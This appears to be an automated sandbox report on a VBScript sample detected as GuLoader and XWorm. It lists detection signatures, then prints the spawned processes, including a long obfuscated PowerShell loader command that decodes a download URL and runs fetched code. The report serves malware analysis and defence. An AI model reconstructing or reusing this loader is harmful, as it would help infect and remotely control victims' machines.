Windows
Analysis Report
file.vbs
Overview
General Information
Detection
GuLoader, XWorm
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected XWorm
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 7676 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\file. vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) powershell.exe (PID: 7772 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Firtalle ne = 1;$As pergilla=' Su';$Asper gilla+='bs trin';$Asp ergilla+=' g';Functio n Jammerkl agen($Tryk luftsappar aterne){$D ialogkort2 23agttagen =$Trykluft sapparater ne.Length- $Firtallen e;For($Dia logkort223 =5;$Dialog kort223 -l t $Dialogk ort223agtt agen;$Dial ogkort223+ =6){$Netto fortjenest e+=$Tryklu ftsapparat erne.$Aspe rgilla.Inv oke( $Dial ogkort223, $Firtalle ne);}$Nett ofortjenes te;}functi on Nassede s($Bibliog rafers){. ($Hers kabshuset) ($Bibliog rafers);}$ Kirkegange =Jammerkla gen 'Ultra M atioInd. pz Gasai R opelafsenl Kon,aStre r/Omsor5Si ckl.Alan,0 P,raf Wall e(HumilWT, ssui Reson .ragdIkke ,oSimilwSk rigsStift SkrivNover vTUnor. Ha r 1Soupi0B eskn.Sekar 0Kalve; Mu lt ,oogaWT ierciD.kke nPers 6Har dw4Twal.;D o,im Tonef x Ener6 ef ri4Abeka;C aboo Mersk rUndervEsp r.:Finge1p reju2Keyse 1 Tena.Ska er0Clogg)N onfo Extr, GPoly,e N. tucMonoskF rounoOhmm /Shor 2Tyr .n0Dott 1E xten0 oder 0Lsbla1Wha .v0Ple e1 Spyt At am F Empli.ro cerSvedtec hirmfDamp. oTribuxBli nd/I.aer1C oncr2S,ent 1Ives.. Se lv0Brnea ' ;$Hydrosal t223=Jamme rklagen 'A gronUGarvn sWurtzeUne corFawni- N,nnA Clum gStepueflo c nLandbtP ains ';$Ch alybean=Ja mmerklagen ' Skynhco nspt Fla,t EaglepFaus ssH smo:sl utt/under/ halv,w Nut gwDefinwKa t e. Kl bs ZarzueLunk snkunstdDr encs Embip Afgi.aEksp ocDe aieHe dvi.bankrc VeneroExag gmReint/Gu ttepLinier preezo .nd e/trylld P enul ,dan/ Frig,p nig p OverxAf ideoEfterd Forfam Pen s ';$Micro gramming=J ammerklage n ' .ebu> fbr ';$Her skabshuset =Jammerkla gen 'Formk iFornye Ti exBank, ' ;$Nikkelet s='Cikorie ekstrakter s';Nassede s (Jammerk lagen 'Til enSRumm eC evittsparr -OversCBux tooForbinO ve ttSubcl eCamounCan edtOvere C ardi-Un lo PPseudaPr tetForsth Plea .atef T Card:Ty, og\ AdredS er,iiProba m sin.eAch ennVasessl i uru ,ila mSand,.,up letBackoxF ouritAlrun Hyst- Tve jV Li.ea f lu.lMikr u Hypere Ass o photo$ P ortNTordei ,ndavkUdda .kNonfee,f tallT iaze Vag,btO.kr esSkrab; A bel ');Nas sedes (Jam merklagen '.rsteiTer riftetan W aist(Tecov t TesseEks eksForbltp iker-unhar p RecaaCal ort KashhN ysen ,lfac TKombi:Mul ci\Moruld, onyaiJubju m Erhve F. lgnKonsts LagnuTubip m Fru,.All oktVennexM ugglt bagf )Ander{,ic keeMeadwx Non.iDisil tPrec }Vir en;Tppe, ' );$Unsolid ifiable = Jammerklag en 'Flutte kar ocWarp lhCharmoKo ler pocy%A eoniaVogte p VarepSub indBumseaE xcomtLae,e a ,erl%cat ar\ AgamBF aglolTyre, aSlutsnAmn inkSp.erof luor. unmo PMariorCha nnoPhleb M isbe&Julet &sknhe Om, rbe,eisecF .rskhRe.it oBili. A,c e$finko '; Nassedes ( Jammerklag en 'Veili$ St legDyre blPa,mao E xtrbBestoa telil laa :WhirlLRaa baoSinisr semid Skyl skoghewUnd